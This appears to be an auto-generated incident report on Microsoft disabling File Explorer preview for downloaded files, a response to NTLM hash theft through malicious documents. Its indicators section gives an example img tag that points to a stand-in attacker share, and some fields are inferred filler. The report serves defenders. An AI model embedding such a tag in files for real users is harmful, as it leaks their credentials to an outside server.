Full Report
Microsoft says that the File Explorer (formerly Windows Explorer) now automatically blocks previews for files downloaded from the Internet to block credential theft attacks via malicious documents. [...]
Analysis Summary
# Incident Report: File Explorer Preview Vulnerability Exploitation
## Executive Summary
Microsoft implemented a security measure to automatically disable the File Explorer preview pane for files marked with the Mark of the Web (MotW), downloaded from the internet, following discovered attacks where an attacker could steal NTLM hashes. This action was a preventative response to an attack vector requiring zero user execution beyond file selection in the preview pane, dramatically reducing the risk of credential theft.
## Incident Details
- Discovery Date: Pre-October 2025 (Implied, as fix was released with October updates)
- Incident Date: Attacks exploiting this vector were active leading up to October 2025.
- Affected Organization: All relevant Windows 11 and Windows Server installations utilizing the File Explorer preview pane.
- Sector: Technology/Software Distribution (Affecting all sectors using Windows).
- Geography: Global (Affecting users of Windows OS).
## Timeline of Events
### Initial Access
- Date/Time: Prior to October 2025 security updates.
- Vector: Malicious documents containing specific HTML tags (e.g., `<img>`, `<object>`, `<link>`) that reference external paths on attacker-controlled servers.
- Details: When a user selected the downloaded file in the File Explorer preview pane, these paths triggered communication to the attacker's server.
### Lateral Movement
- Not explicitly detailed as a result of this specific exploit; the immediate impact was credential theft.
### Data Exfiltration/Impact
- Data Exfiltration: NTLM hashes were leaked/stolen when the internal system reached out to the attacker-controlled server referenced in the malicious document's HTML tags.
- Impact: Loss of user credentials (NTLM hashes).
### Detection & Response
- Detection: Microsoft identified the vulnerability allowing NTLM hash leakage upon file preview.
- Response Actions: Microsoft released security updates starting October 2025 which automatically disabled the File Explorer preview feature for MotW-marked files.
## Attack Methodology
- Initial Access: Placing malicious files on the internet (downloadable).
- Persistence: Not applicable for this specific vulnerability type. The exploitation was immediate upon preview.
- Privilege Escalation: Not applicable.
- Defense Evasion: Exploited a legitimate OS function (Preview Pane) to gain access to network resources without requiring user execution of the file itself.
- Credential Access: Collection of NTLM hashes via forced network lookups initiated by the preview pane rendering engine.
- Discovery: Not applicable (Attack relied on pre-configured references within the file).
- Lateral Movement: Not applicable within the scope of this specific vulnerability report.
- Collection: NTLM hashes.
- Exfiltration: Hashes were sent to attacker-controlled external servers referenced in the file tags.
- Impact: Successful credential harvesting.
## Impact Assessment
- Financial: Not explicitly disclosed (Cost of remediation/patching, potential business impact from subsequent breaches).
- Data Breach: NTLM hashes (credentials). Volume/Scope depends on how often users previewed impacted files.
- Operational: Minimal operational impact for end-users, as the change was introduced via standard updates, though workflows requiring previewing untrusted documents were interrupted.
- Reputational: Minor reputational impact for Microsoft due to the discovery of a major credential leakage vector in a core OS feature.
## Indicators of Compromise
- Network indicators: Connections initiated to external servers when previewing MotW-marked files due to HTML tags referencing external paths (e.g., HTTP/SMB requests containing authentication attempts).
- File indicators: Files marked with Mark of the Web (MotW) containing specific HTML elements referencing external paths (e.g., those utilizing `<img src="\\attacker_share\log">`, or similar structures).
- Behavioral indicators: Unexpected outbound network traffic originating from File Explorer processes when a user simply selects a downloaded file in the preview pane.
## Response Actions
- Containment measures: Disabling the preview functionality in File Explorer for files flagged with MotW.
- Eradication steps: Users must manually "Unblock" files via Properties > General tab after the update if they trust the source, or remove the file share from the Local Intranet or Trusted Sites zone.
- Recovery actions: Post-patch, ongoing monitoring for NTLM relay attempts originating from compromised systems.
## Lessons Learned
- Key takeaways: Reliance on benign user interaction (like using the preview pane) can be a significant attack vector, especially for credential theft (NTLM relay opportunity).
- What could have been done better: Security controls against credential leakage via native OS features (like previewing) should be robust by default, especially when handling external content.
## Recommendations
- Prevention measures for similar incidents: Ensure all systems utilize modern, secure authentication protocols (e.g., Kerberos over NTLM where possible). Implement enhanced logging and monitoring specifically for network activity triggered by the File Explorer process when viewing downloaded files. Review security hardening guides to disable/restrict features that automatically make external connections upon file interaction.